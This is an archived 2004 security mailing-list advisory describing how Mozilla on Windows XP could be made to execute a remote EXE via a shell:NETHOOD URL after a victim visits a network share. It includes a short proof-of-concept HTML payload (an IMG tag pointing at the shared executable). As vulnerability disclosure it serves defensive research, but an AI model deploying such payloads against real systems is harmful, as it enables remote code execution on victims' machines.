MOZILLA: SHELL can execute remote EXE program

liudieyu_at_umbrella.name
Date: 07/09/04

Next message: Drew Copley: "RE: MSIE Download Window Filename + Filetype Spoofing Vulnerability"

Previous message: Paul: "HijackClick 3"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <bugtraq@securityfocus.com>, <NTBugtraq@listserv.ntbugtraq.com>, <full-disclosure@lists.netsys.com>
Date: Fri, 9 Jul 2004 02:43:30 -0000

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research , and Cheng Peng Su for his
original discovery.

liudieyu

http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################
<!--
MOZILLA REMOTE COMPROMISE DEMO

REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.

CREATED BY:
"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME

COPYRIGHT:
This Demo is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
-->

[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

Next message: Drew Copley: "RE: MSIE Download Window Filename + Filetype Spoofing Vulnerability"

Previous message: Paul: "HijackClick 3"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

MOZILLA: SHELL can execute remote EXE program
... This Advisory is Copyright 2004 "Liu Die Yu". ... You may not modify it and distribute it or distribute parts of it without the ... MAKE MOZILLA REQUEST THE FOLLOWING URL: ...
(Full-Disclosure)
[Full-Disclosure] MOZILLA: SHELL can execute remote EXE program
... This Advisory is Copyright 2004 "Liu Die Yu". ... You may not modify it and distribute it or distribute parts of it without the ... MAKE MOZILLA REQUEST THE FOLLOWING URL: ...
(Full-Disclosure)